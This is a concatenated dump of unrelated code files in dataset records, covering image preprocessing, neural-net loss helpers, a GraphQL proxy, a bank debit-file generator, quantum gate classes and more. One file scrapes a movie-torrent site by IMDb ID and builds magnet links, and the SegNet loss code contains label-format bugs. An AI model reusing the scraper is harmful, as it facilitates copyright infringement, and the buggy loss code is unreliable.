reshaped_data = combined_data.reshape((TRAIN_LEN*228*228), 6)\n reshaped_data = reshaped_data[np.squeeze(np.asarray(reshaped_data[:, 1])) != 228., :]\n np.set_printoptions(threshold=100)\n print(reshaped_data)\n mean = reshaped_data.mean(axis = 0)\n std = reshaped_data.std(axis = 0)\n return mean, std\n\nif __name__ == \"__main__\":\n TRAIN_LEN = 301\n base_path = 
'../WhitePlains_data/pixor/train'\n mean, std = standardize_stats(TRAIN_LEN, base_path)\n print(\"mean: \" + str(mean))\n print(mean.shape)\n print(\"std: \" + str(std))\n print(std.shape)\n np.save(\"train_mean\", mean)\n np.save(\"train_std\", std)\n \n ","sub_path":"pixor/train_labels_preprocessing.py","file_name":"train_labels_preprocessing.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"620647817","text":"import asyncio\nfrom functools import wraps\n\n\nclass ExceptionHandler(object):\n def __init__(self, att):\n self.att = att\n\n async def __aenter__(self):\n return self\n\n async def __aexit__(self, exc_type, exc_instance, tracebacks):\n if exc_type is None:\n return True\n if issubclass(exc_type, KeyError):\n return True\n elif issubclass(exc_type, ValueError):\n return True\n elif issubclass(exc_type, IndexError):\n return True\n elif issubclass(exc_type, AttributeError):\n return True\n elif issubclass(exc_type, TypeError):\n return True\n return False\n\n\ndef retry(retry_times=6, exc_handler=ExceptionHandler):\n def outter(func):\n @wraps(func)\n async def inner(*args, **kwargs):\n att = 0\n while att <= retry_times:\n async with exc_handler(att):\n result = await func(*args, **kwargs)\n return result\n att += 1\n return\n return inner\n return outter\n","sub_path":"base/exceptioner.py","file_name":"exceptioner.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"267168195","text":"from kivymd.uix.dialog import MDDialog\nfrom kivymd.uix.button import (MDFillRoundFlatButton,\n MDFlatButton)\n\ndef error_dialogue(screen, message):\n\n dialog = MDDialog(\n text = message,\n buttons = [\n MDFlatButton(\n text = \"OK\",\n #on_release= MainApp().change_screen(screen)\n )\n ]\n )\n dialog.open()\n\n","sub_path":"Dialogue.py","file_name":"Dialogue.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"219536258","text":"# -*- encoding: utf-8 -*-\n\nfrom debauto.remessa import Remessa\nfrom debauto.utils import formata_data, formata_valor\n\n\nclass Caixa(Remessa):\n \"\"\"\n Caixa\n \"\"\"\n __a = \"A{:1}{:20}{:20}{:3}{:20}{:8}{:6}{:2}{:17}{:45}{:0>7}\\r\\n\"\n __e = \"E{:0>25}{:0<4}{:14}{:8}{:0<15}{:2}{:60}{:6}{:8}{:0>6}{:1}\\r\\n\"\n __z = \"Z{:0>6}{:0>17}{:119}{:0>6}{:1}\"\n\n def __init__(self, *args, **kwargs):\n super(Caixa, self).__init__(*args, **kwargs)\n\n self.__cod_remessa = 1\n self.__banco = \"CAIXA\"\n self.__codigo = \"104\"\n self.__versao = '04'\n self.__identificacao = \"DEB AUTOMAT\"\n\n @property\n def banco(self):\n return \"%s\" % self.__banco\n\n def get_header(self):\n \"\"\" retorna o header do arquivo \"\"\"\n cfg = self.configuracao\n\n return self.__a.format(\n self.__cod_remessa, # 1 - Código da remessa\n cfg.convenio, # 20 - Código do convênio\n cfg.empresa, # 20 - Nome da empresa\n self.__codigo, # 3 - Código do banco\n self.__banco, # 20 - Nome do banco\n formata_data(cfg.vencimento), # 8 - Data do movimento\n cfg.sequencial, # 6 - Número sequencial\n self.__versao, # 2 - Versão do layout\n self.__identificacao, # 17 - Identificação do serviço\n '', '0'\n )\n\n def get_debitos(self):\n \"\"\" retorna as linhas e do arquivo \"\"\"\n linhas = []\n\n for n, x in enumerate(self.debitos, 1):\n linhas.append(self.__e.format(\n x.identificacao,\n x.agencia,\n x.conta,\n 
formata_data(x.vencimento),\n formata_valor(x.valor),\n x.moeda,\n x.livre,\n \"\",\n \"\",\n n,\n x.tipo\n ))\n\n return linhas\n\n def get_trailler(self):\n \"\"\" retorna o trailler do arquivo \"\"\"\n return self.__z.format(\n self.quantidade() + 2,\n formata_valor(self.valor_total()),\n '',\n self.quantidade() + 1,\n ''\n )\n\n def gerar_txt(self, path):\n cfg = self.configuracao\n nome = \"%s_%s_%s.txt\" % (self.banco, formata_data(cfg.vencimento), cfg.sequencial)\n\n with open('%s%s' % (path, nome), 'w+') as f:\n f.write(self.get_header())\n\n for _ in self.get_debitos():\n f.write(_)\n\n f.write(self.get_trailler())\n\n def __repr__(self):\n \"\"\" representação do objeto \"\"\"\n return \"\" % self.banco\n","sub_path":"debauto/bancos/caixa.py","file_name":"caixa.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"325359441","text":"__author__ = 'Young'\n\n\"\"\"\nImplement int sqrt(int x).\n\nCompute and return the square root of x.\n\"\"\"\n\n\nclass Solution(object):\n def mySqrt(self, x):\n \"\"\"\n :type x: int\n :rtype: int\n \"\"\"\n y = x\n while y*y > x:\n y = (y + x/y)/2\n return y\n","sub_path":"sqrt(x).py","file_name":"sqrt(x).py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"596396739","text":"import tensorflow as tf\nimport numpy as np\n\n\n\ndef normal_loss(logits, labels, num_classes):\n \"\"\"This function focus on computing normal loss.\n \n Args:\n logits: 4D tensor. output tensor from segnet model, which is the output of the decode without softmax\n labels: true label tensor\n num_classes: the number of classes for the dataset \n Returns:\n loss, accuracy, prediction(logits with softmax) \n \n \"\"\"\n # flatten the labels\n labels_flatten = tf.reshape(labels, [-1])\n labels_one_hot = tf.one_hot(labels_flatten, depth=num_classes)\n logits_reshape = tf.reshape(logits, [-1, num_classes])\n cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=labels_one_hot, \n logits=logits_reshape, \n name='cross_entropy')\n \n # compute loss, which is cross entropy mean\n cross_entropy_mean = tf.reduce_mean(cross_entropy, name='cross_entropy')\n tf.summary.scalar(name='loss', tensor=cross_entropy_mean)\n \n # compute prediction for labels\n predicts = tf.argmax(logits_reshape, axis=-1)\n true_predicts = tf.equal(predicts, labels_flatten)\n \n # compute accuracy\n accuracy = tf.reduce_mean(tf.cast(true_predicts, tf.float32))\n tf.summary.scalar(name='loss', tensor=accuracy)\n \n return cross_entropy_mean, accuracy, predicts\n\n\ndef weighted_loss(logits, labels, num_classes, frequency):\n \"\"\"This function focus on computing weighted loss. Here frequency represents balancing frequency for each label, the formul\n is following: frequency=ln(total_sample/sample(c)), total_sample is the toatl sample of pixels in images, sample(c) is the \n number of pixels of class c in the images\n \n Args:\n logits: 4D tensor. 
output tensor from segnet model, which is the output of the decode without softmax\n labels: true label tensor\n num_classes: the number of classes for the dataset \n frequency: the weights for each classes\n Returns:\n loss, accuracy, prediction(logits with softmax) \n \n \"\"\"\n # flatten the labels\n labels_flatten = tf.reshape(labels, [-1])\n labels_one_hot = tf.one_hot(labels_flatten, depth=num_classes)\n logits_reshape = tf.reshape(logits, [-1, num_classes])\n cross_entropy = tf.nn.weighted_cross_entropy_with_logits(labels=labels_one_hot, \n logits=logits_reshape, \n pos_weight=frequency)\n # compute loss, which is cross entropy mean\n \n cross_entropy_mean = tf.reduce_mean(cross_entropy, name='cross_entropy')\n tf.summary.scalar(name='loss', tensor=cross_entropy_mean)\n \n # compute prediction for labels\n predicts = tf.argmax(logits_reshape, axis=-1)\n true_predicts = tf.equal(predicts, labels_flatten)\n \n # compute accuracy\n accuracy = tf.reduce_mean(tf.cast(true_predicts, tf.float32))\n tf.summary.scalar(name='loss', tensor=accuracy)\n \n return cross_entropy_mean, accuracy, tf.argmax(logits_reshape, axis=-1)\n \n \ndef calc_loss(logits, labels, num_classes):\n \"\"\"\n \n \"\"\"\n loss_weight = np.array([0.2595, 2.3614, 2.5640, 0.1417, 0.6823, 0.9051, \n 0.3826, 1.8418, 2.6446, 0.2478, 0.1826, 1.0974, 0.2253])\n \n # class 0 to 12, but the class 11 is ignored, so maybe the class 11 is background!\n\n labels = tf.cast(labels, dtype=tf.int64)\n loss, accuracy, prediction = weighted_loss(logits, labels, num_classes=num_classes, frequency=loss_weight)\n return loss, accuracy, prediction\n \n \n\ndef train_op(total_loss, global_steps, base_learning_rate):\n \"\"\"This function defines train optimizer \n Args:\n total_loss: the loss value\n global_steps: global steps is used to track how many batch had been passed. In the training process, the initial value for global_steps = 0, here \n global_steps=tf.Variable(0, trainable=False). 
then after one batch of images passed, the loss is passed into the optimizer to update the weight, then the global \n step increased by one.\n Returns:\n the train optimizer\n \"\"\"\n # get updated opration \n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n # base_learning_rate = 0.1\n # define learning rate decay strategy, here we used exponentiel_decay\n learning_rate_decay = tf.train.exponential_decay(base_learning_rate, global_steps, 1000, 0.0005)\n optimizer = tf.train.GradientDescentOptimizer(learning_rate_decay)\n print(\"Running with Adam Optimizer with learning rate:\", learning_rate_decay)\n \n grads = optimizer.compute_gradients(total_loss)\n training_op = optimizer.apply_gradients(grads, global_step=global_steps)\n \n return training_op\n \n \n\ndef per_class_acc(predicts, labels):\n \"\"\"\n This function is copied from \"Implement slightly different segnet on tensorflow\"\n \"\"\"\n #labels = labels\n\n batch_size = predicts.shape[0]\n num_classes = predicts.shape[3]\n hist = np.zeros((num_classes, num_classes))\n for i in range(batch_size):\n hist += fast_hist(labels[i].flatten(), predicts[i].argmax(2).flatten(), num_classes)\n total_acc = np.diag(hist).sum() / hist.sum()\n print('accuracy = %f' %np.nanmean(total_acc))\n \n iou = np.diag(hist) / (hist.sum(1) + hist.sum(0) - np.diag(hist))\n print('mean IoU = %f' % np.nanmean(iou))\n for i in range(num_classes):\n if float(hist.sum(1)[i]) == 0:\n acc = 0.0\n else:\n acc = np.diag(hist)[i] / float(hist.sum(1)[i])\n print(\"class %d accuracy = %f \" % (i, acc))\n\n\ndef fast_hist(a, b, n):\n \"\"\"\n This function is copied from \"Implement slightly different segnet on tensorflow\"\n \"\"\"\n k = (a >= 0) & (a < n)\n return np.bincount(n * a[k].astype(int) + b[k], minlength=n**2).reshape(n, n)\n\n\ndef get_hist(predicts, labels):\n \"\"\"\n This function is copied from \"Implement slightly different segnet on tensorflow\"\n \"\"\"\n num_classes = predicts.shape[3] \n batch_size = predicts.shape[0]\n hist = np.zeros((num_classes, num_classes))\n for i in range(batch_size):\n hist += fast_hist(labels[i].flatten(), predicts[i].argmax(2).flatten(), num_classes)\n return hist\n\n\n\ndef print_hist_summary(hist):\n \"\"\"\n This function is copied from \"Implement slightly different segnet on tensorflow\"\n \"\"\"\n total_acc = np.diag(hist).sum() / hist.sum()\n print('accuracy = %f' % np.nanmean(total_acc))\n iou = np.diag(hist) / (hist.sum(1) + hist.sum(0) - np.diag(hist))\n print('mean IoU = %f' % np.nanmean(iou))\n for i in range(hist.shape[0]):\n if float(hist.sum(1)[i]) == 0:\n acc = 0.0\n else:\n acc = np.diag(hist)[i] / float(hist.sum(1)[i])\n print(\"class %d accuracy = %f \" %(i, acc))\n","sub_path":"segnet/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":7024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"37824001","text":"from docker.errors import APIError\nfrom flask import request, jsonify, make_response\nfrom flask_restplus import Resource, fields, Namespace, Api\nfrom proxy.exceptions import RequestException\nfrom proxy.interceptor import Interceptor\nfrom proxy.utils import validate_graphql_request, execute_graphql_request\nfrom security.decorators import token_required\n\n# pylint: disable=unused-variable\n\n\ndef register_graphql(namespace: Namespace, api: Api):\n \"\"\"Method used to register the GraphQL namespace and endpoint.\"\"\"\n\n # Create expected headers and payload\n headers 
= api.parser()\n payload = api.model('Payload', {'query': fields.String(\n required=True,\n description='GraphQL query or mutation',\n example='{allIndicatorTypes{nodes{id,name}}}')})\n\n @namespace.route('/graphql', endpoint='with-parser')\n @namespace.doc()\n class GraphQL(Resource):\n decorators = [token_required]\n\n @namespace.expect(headers, payload, validate=True)\n def post(self):\n \"\"\"\n Execute GraphQL queries and mutations\n Use this endpoint to send http request to the GraphQL API.\n \"\"\"\n payload = request.json\n\n try:\n # Validate http request payload and convert it to GraphQL document\n graphql_document = validate_graphql_request(\n payload['query'])\n\n # Verify GraphQL mutation can be handled\n interceptor = Interceptor()\n mutation_name = interceptor.get_mutation_name(graphql_document)\n\n # Surcharge payload before request\n if mutation_name:\n payload['query'] = interceptor.before_request(\n mutation_name)\n\n # Execute request on GraphQL API\n status, data = execute_graphql_request(payload)\n if status != 200:\n raise RequestException(status, data)\n\n # Execute custom scripts after request\n if mutation_name:\n data = interceptor.after_request(mutation_name, data)\n\n return make_response(jsonify(data), status)\n\n except RequestException as exception:\n return exception.to_response()\n\n except APIError as exception:\n return make_response(jsonify({'message': exception.explanation}), exception.status_code)\n","sub_path":"api/init/proxy/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"365225315","text":"import sys\nimport json\nimport base64\nimport re\nimport urllib\nimport urllib2\nimport bencode\nimport hashlib \n\nPAYLOAD = json.loads(base64.b64decode(sys.argv[1]))\n\ndef search(query):\n response = urllib2.urlopen(\"https://yts.re/browse-movie/%s\" % urllib.quote_plus(query))\n data = response.read()\n if response.headers.get(\"Content-Encoding\", \"\") == \"gzip\":\n import zlib\n data = zlib.decompressobj(16 + zlib.MAX_WBITS).decompress(data)\n return [{\"uri\": torrent2magnet(torrent)} for torrent in re.findall(r'https://.*\\.torrent', data)]\n\t\ndef search_episode(imdb_id, tvdb_id, name, season, episode):\n return []\n\ndef search_movie(imdb_id, name, year):\n return search(imdb_id)\n\ndef torrent2magnet(torrent_url):\n response = urllib2.urlopen(torrent_url)\n torrent = response.read()\n metadata = bencode.bdecode(torrent)\n hashcontents = bencode.bencode(metadata['info'])\n digest = hashlib.sha1(hashcontents).digest()\n b32hash = base64.b32encode(digest)\n magneturl = 'magnet:?xt=urn:btih:' + b32hash + '&dn=' + metadata['info']['name']\n return magneturl\n\nurllib2.urlopen(\n PAYLOAD[\"callback_url\"],\n data=json.dumps(globals()[PAYLOAD[\"method\"]](*PAYLOAD[\"args\"]))\n)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"165790206","text":"#!/usr/bin/env python3\nimport json\n\nclass routePlan:\n\tdef route(inFile, outFile, cSpeed):\n\t\tx = [];\n\t\ty = [];\n\t\tz = [];\n\t\tfData = open(inFile, 'r');\n\t\tfor line in fData :\n\t\t\tcsv = line.split(',');\n\t\t\tx.append(float(csv[0]));\n\t\t\ty.append(float(csv[1]));\n\t\t\tz.append(float(csv[2]));\n\t\tfData.close();\n\t\t\n\t\t# Boiler plate code for creating a route plan\n\t\tplan = {};\n\t\tgeoFence = 
{};\n\t\tplan['fileType'] = 'Plan';\n\t\tgeoFence['polygon'] = [];\n\t\tgeoFence['version'] = 1;\n\t\tplan['geoFence'] = geoFence;\n\t\tplan['groundStation'] = 'QGroundControl';\n\t\titems = [];\n\t\t\n\t\t# add datapoints\n\t\titem = {};\n\t\titem['autoContinue'] = True;\n\t\titem['command'] = 22;\n\t\titem['doJumpId'] = 1;\n\t\titem['frame'] = 3;\n\t\titem['params'] = [0,0,0,0,x[0],y[0],z[0]];\n\t\titem['type'] = 'SimpleItem';\n\t\titems.append (item);\n\t\t\n\t\tfor i in range(1,len(x)) :\n\t\t\titem = {};\n\t\t\titem['autoContinue'] = True;\n\t\t\titem['command'] = 16;\n\t\t\titem['doJumpId'] = 2;\n\t\t\titem['frame'] = 3;\n\t\t\titem['params'] = [0,0,0,0,x[i],y[i],z[i]];\n\t\t\titem['type'] = 'SimpleItem';\n\t\t\titems.append (item);\n\t\t\n\t\t# Establish mission\t\n\t\tmission = {}\n\t\tmission['cruiseSpeed'] = cSpeed;\n\t\tmission['firmwareType'] = 3;\n\t\tmission['hoverSpeed'] = 5;\n\t\tmission['items'] = items;\n\t\tmission['plannedHomePosition'] = [x[0], y[0], z[0]];\n\t\tmission['vehicleType'] = 2;\n\t\tmission['version'] = 2;\n\t\tplan['mission'] = mission;\n\t\t\n\t\t# Rally points\n\t\trallyPoints = {};\n\t\trallyPoints['points'] = []; \n\t\trallyPoints['version'] = 1;\n\t\tplan['rallyPoints'] = rallyPoints;\n\n\t\t# plan version\n\t\tplan['version'] = 1\n\n\t\t# Create JSON file\n\t\tplan_json = json.dumps(plan, indent=4, sort_keys=True)\n\n\t\tfile = open(outFile,'w') \n\t\tfile.write (plan_json)\n\t\tfile.close()\n","sub_path":"UTMHandling/route/routePlan.py","file_name":"routePlan.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"86243472","text":"\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 2021\n@author: Alex https://github.com/alexcasella\n\"\"\"\n# Awesome Streamlit\nimport streamlit as st\n\n# Add pages -- see those files for deatils within\nfrom page_joseph import page_joseph\nfrom page_rohit import page_rohit\nfrom page_introduction import page_introduction\nfrom page_kanishk import page_kanishk\n\n# Use random seed\nimport numpy as np\nnp.random.seed(1)\n\n\n# Set the default elements on the sidebar\nst.set_page_config(page_title='SteamingHot',layout='wide')\n\nst.markdown(\"
\\\n Steaming Hot
\", unsafe_allow_html=True)\n\nst.sidebar.write(\" \")\n\n\ndef main():\n \"\"\"\n Register pages to Explore and Fit:\n page_introduction - contains page with images and brief explanations\n page_joseph - contains joseph's algorithm\n page_rohit - rohit's algorithm\n page_kanishk - kanishk's algorithm\n \"\"\"\n\n pages = {\n \"Introduction\": page_introduction,\n \"Time Comparison\": page_joseph,\n \"Feature Score\": page_rohit,\n \"Owners Prediction\" : page_kanishk\n }\n\n st.sidebar.title(\"Main options\")\n\n # Radio buttons to select desired option\n page = st.sidebar.radio(\"Select:\", tuple(pages.keys()))\n \n # Display the selected page with the session state\n pages[page]()\n\n # Write About\n st.sidebar.header(\"About\")\n st.sidebar.warning(\n \"\"\"\n SteamingHot app is created and maintained by \n **Alex Casella**. If you like this app please star its\n [**GitHub**](https://github.com/alexcasella)\n repo, share it and feel free to open an issue if you find a bug \n or if you want some additional features.\n \"\"\"\n )\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"496024279","text":"from src.services.decorators import allow_roles\nfrom src.repos.category import CategoryRepo\n\n\nclass CategoryService:\n def __init__(self, repo: CategoryRepo):\n self._repo = repo\n\n def get_all(self):\n return self._repo.get_all()\n\n def get_one(self, id_):\n try:\n return self._repo.get_by_id(id_)\n except self._repo.DoesNotExist:\n raise self.CategoryNotFound()\n\n @allow_roles(['admin', 'manager'])\n def create(self, data, *args, **kwargs):\n with self._repo.session() as s:\n return self._repo.add_category(\n data['names'],\n data.get('parent_category_id'),\n session=s\n )\n\n @allow_roles(['admin', 'manager'])\n def update(self, id_, data, *args, **kwargs):\n try:\n with self._repo.session() as s:\n parent_category_id = data.get('parent_category_id')\n if (parent_category_id != None and parent_category_id == id_):\n raise self.CircularCategoryConnection()\n\n return self._repo.update_category(\n id_,\n data['names'],\n parent_category_id,\n session=s\n )\n except self._repo.DoesNotExist:\n raise self.CategoryNotFound()\n\n @allow_roles(['admin', 'manager'])\n def delete(self, id_):\n try:\n return self._repo.delete(id_)\n except self._repo.DoesNotExist:\n raise self.CategoryNotFound()\n\n class CategoryNotFound(Exception):\n pass\n\n class CircularCategoryConnection(Exception):\n pass\n","sub_path":"backend/src/services/category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"203188880","text":"\"\"\"\nCreated on Sun Feb 2 13:28:48 2020\n\n@author: matias\n\"\"\"\n\nimport numpy as np\nimport emcee\n\nimport sys\nimport os\nfrom pc_path import definir_path\npath_git, path_datos_global = definir_path()\nos.chdir(path_git)\nsys.path.append('./Software/Funcionales/')\nfrom funciones_int_sist_1 import Hubble_teorico_1\n\ndef parametros_derivados(sampler,discard, thin,model='EXP'):\n\t'''Esta función convierte las cadenas de omega_m y H0 de LCDM\n\ten las cadenas de omega_m y H0 fisicas'''\n\tflat_samples = sampler.get_chain(discard=discard, flat=True, thin=thin)\n\tlen_chain=flat_samples.shape[0]\n\tnew_samples = np.full_like(flat_samples,1)\n\tfor i in range(len_chain):\n\t#for i 
in range(1000,1100):\n\t\tif len(flat_samples[0,:])==3:\n\t\t\tomega_m_lcdm = flat_samples[i,0]\n\t\t\tb = flat_samples[i,1]\n\t\t\tH0_lcdm = flat_samples[i,2]\n\t\t\t_, Hubble = Hubble_teorico_1([omega_m_lcdm,b,H0_lcdm], verbose=False, model=model)\n\t\t\tH0 = Hubble[0]\n\t\t\tomega_m = omega_m_lcdm * (H0_lcdm/H0)**2\n\n\t\t\tnew_samples[i,0] = omega_m\n\t\t\tnew_samples[i,1] = b\n\t\t\tnew_samples[i,2] = H0\n\t\telif len(flat_samples[0,:])==4:\n\t\t\tomega_m_lcdm = flat_samples[i,1]\n\t\t\tb = flat_samples[i,2]\n\t\t\tH0_lcdm = flat_samples[i,3]\n\t\t\t_, Hubble = Hubble_teorico_1([omega_m_lcdm,b,H0_lcdm], verbose=False, model=model)\n\t\t\tH0 = Hubble[0]\n\t\t\tomega_m = omega_m_lcdm * (H0_lcdm/H0)**2\n\n\t\t\tnew_samples[i,0] = flat_samples[i,0]\n\t\t\tnew_samples[i,1] = omega_m\n\t\t\tnew_samples[i,2] = b\n\t\t\tnew_samples[i,3] = H0\n\n\t#\tprint('Completado: {}/{}'.format(i,len_chain))\n\treturn new_samples\n","sub_path":"Software/Funcionales/funciones_parametros_derivados.py","file_name":"funciones_parametros_derivados.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"84381355","text":"\"\"\"\n升序排列的整数数组 nums 在预先未知的某个点上进行了旋转(例如, [0,1,2,4,5,6,7] 经旋转后可能变为[4,5,6,7,0,1,2] )。\n请你在数组中搜索target ,如果数组中存在这个目标值,则返回它的索引,否则返回-1。\n\n示例 1:\n输入:nums = [4,5,6,7,0,1,2], target = 0\n输出:4\n\n示例2:\n输入:nums = [4,5,6,7,0,1,2], target = 3\n输出:-1\n\n示例 3:\n输入:nums = [1], target = 0\n输出:-1\n\n\n\"\"\"\n\n\"\"\"\n题目要求算法时间复杂度必须是 O(\\log n)O(logn) 的级别,这提示我们可以使用二分搜索的方法。\n\n但是数组本身不是有序的,进行旋转后只保证了数组的局部是有序的,这还能进行二分搜索吗?答案是可以的。\n\n可以发现的是,我们将数组从中间分开成左右两部分的时候,一定有一部分的数组是有序的。\n拿示例来看,我们从 6 这个位置分开以后数组变成了 [4, 5, 6] 和 [7, 0, 1, 2] 两个部分,\n其中左边 [4, 5, 6] 这个部分的数组是有序的,其他也是如此。\n\n\"\"\"\n\n#大神做法1\nclass Solution:\n def search(self, nums: List[int], target: int) -> int:\n length = len(nums)\n left, right = 0, length - 1\n\n while left <= right:\n mid = left + (right - left) // 2\n if nums[mid] == target:\n return mid\n if nums[0] <= nums[mid]: # mid在左半边有序��组\n if nums[0] <= target < nums[mid]: # 并且目标在左半边有序数组中\n right = mid - 1\n else:\n left = mid + 1\n else: # mid在右半边有序数组\n if nums[mid] < target <= nums[-1]: # 并且目标在右半边有序数组中\n left = mid + 1\n else:\n right = mid - 1\n\n return -1\n\n","sub_path":"中等33. 搜索旋转排序数组.py","file_name":"中等33. 
搜索旋转排序数组.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"314755165","text":"class TofoliGate:\n def __init__(self, control, inv, length):\n self.control= control\n self.inv = inv\n self.length= length\n self.num = '-'\n def inf(self, bit):\n if bit == -1:\n return -1\n if bit&self.control == self.control:\n return bit^self.inv\n return bit\n# def cost():\n# count, c =0, self.control\n def control_num(self):\n if self.num != '-':\n return self.num\n num, point = 0, 1\n for i in range(self.length):\n if self.control&point == point:\n num += 1\n point *= 2\n self.num = num\n return num\n def __eq__(self, other):\n return self.control==other.control and self.inv==other.inv \\\n and self.length==other.length\n def __hash__(self):\n return hash((2^self.length*self.control)+self.inv)\n def __str__(self):\n dot, xor, string= self.control, self.inv, '--'\n for i in range(self.length):\n if dot%2==1:\n string = string + '·--'\n elif xor%2==1:\n string = string + '⊕--'\n else:\n string = string + '---'\n dot, xor = dot//2, xor//2\n string = string +'\\n'+'--'\n for i in range(self.length):\n string = string + '|--'\n return string\n\n\nclass SwapGate:\n def __init__(self, bit1, bit2, length):\n self.bit1= bit1\n self.bit2 = bit2\n self.length= length\n def inf(self, bit):\n if bit == -1:\n return -1\n b = bit|self.bit1|self.bit2\n if bit&self.bit1==0:\n b = b -self.bit2\n if bit&self.bit2==0:\n b = b - self.bit1\n return b\n def control_num(self):\n return 0\n def __eq__(self, other):\n return self.bit1==other.bit1 and self.bit2==other.bit2 \\\n and self.length==other.length\n def __str__(self):\n swap, string= self.bit1+self.bit2, '--'\n for i in range(self.length):\n if swap%2==1:\n string = string + 's--'\n else:\n string = string + '---'\n swap= swap//2\n string = string + '\\n--'\n for i in range(self.length):\n string = string + '|--'\n return string\n\nclass QCircuit:\n def __init__(self, q_list):\n self.list= q_list\n self.dict = {}\n for q in q_list:\n if not str(q.control_num()) in self.dict:\n self.dict[str(q.control_num())] = 1\n else: self.dict[str(q.control_num())] += 1\n def inf(self, bit):\n b = bit\n for q in self.list:\n b = q.inf(b)\n return b\n def __iter__(self):\n self.iterator = iter(self.list)\n return self\n def __del__(self):\n del self.list\n def __next__(self):return next(self.iterator)\n def __str__(self):\n string = ''\n for q in self.list:\n string = string + str(q)+'\\n'\n return string\n def __len__(self):\n return len(self.list)\n def __eq__(self, other):\n if len(self) != len(other): return False\n for i in range(len(self)):\n if not self.list[i]==other.list[i]:return False\n return True\n def add(self, circuit, typ):\n if typ == 'f':\n self.list= self.list + circuit.list\n else:\n self.list = circuit.list+ self.list\n for key in circuit.dict:\n if not key in self.dict:\n self.dict[key] = circuit.dict[key]\n else: self.dict[key] += circuit.dict[key]\n def reverse(self):\n self.list.reverse()\n result = QCircuit(self.list.copy())\n self.list.reverse()\n return result\n def cost(self, h_cost, typ='length'):\n if typ == 'length':\n #print(len(self))\n return len(self)\n if typ == 'Hamming':\n return h_cost\n if typ[:3]=='NCV':\n result = 0\n table = [1,1,5,13,29,61,125,253,509,1021]\n n_cost, c_cost, v_cost = int(typ[-3]), int(typ[-2]), int(typ[-1])\n for key in self.dict:\n if key == '0':\n result += (n_cost*self.dict['0'])\n elif key == '1':\n result += 
(c_cost*self.dict['1'])\n elif key == '2':\n result += ((2*c_cost + 3*v_cost)*self.dict['2'])\n elif int(key) < 10:\n result += (table[int(key)]*self.dict[key])\n else: result += ((1<<(int(key)+1))-3)*self.dict[key]\n #print(result)\n #print(\"complete\")\n return result \n \n \n'''\nt= SwapGate(1,4,3)\nl= QCircuit([t])\nprint(l)\nprint(l.inf(3))\n'''\n","sub_path":"gates.py","file_name":"gates.py","file_ext":"py","file_size_in_byte":4764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"20033288","text":"from models.parser import Parser\nfrom models.processor import Processor\nfrom models.analyzer import Analyzer\n\nclass Pipeline:\n\n def __init__(self, data, user, trial):\n self.data = data\n self.user = user\n self.trial = trial\n self.parser, self.processor, self.analyzer = [None]*3\n self.feed()\n\n def feed(self):\n self.parser = Parser(self.data)\n self.processor = Processor(self.parser.parsed_data)\n self.analyzer = Analyzer(self.processor.filtered_data, self.user, self.trial)\n","sub_path":"models/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"204468182","text":"from . import RedirectTo\nfrom .BaseFormAction import BaseFormAction\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.CMFFormController.FormController import registerFormAction\nfrom six.moves import reduce\n\n\ndef factory(arg):\n \"\"\"Create a new redirect-to-action action\"\"\"\n return RedirectToAction(arg)\n\n\nclass RedirectToAction(BaseFormAction):\n\n def __call__(self, controller_state):\n action = self.getArg(controller_state)\n action_url = None\n haveAction = False\n\n context = controller_state.getContext()\n fti = context.getTypeInfo()\n\n try:\n # Test to see if the action is defined in the FTI as an object or\n # folder action\n action_ob = fti.getActionObject('object/'+action)\n if action_ob is None:\n action_ob = fti.getActionObject('folder/'+action)\n action_url = action_ob.getActionExpression()\n haveAction = True\n except (ValueError, AttributeError):\n actions_tool = getToolByName(context, 'portal_actions')\n actions = actions_tool.listFilteredActionsFor(\n controller_state.getContext())\n # flatten the actions as we don't care where they are\n actions = reduce(lambda x,y,a=actions: x+a[y], actions.keys(), [])\n for actiondict in actions:\n if actiondict['id'] == action:\n action_url = actiondict['url'].strip()\n haveAction = True\n break\n\n # (note: action_url may now be an emptry string, but still valid)\n if not haveAction:\n raise ValueError('No %s action found for %s' % (action, 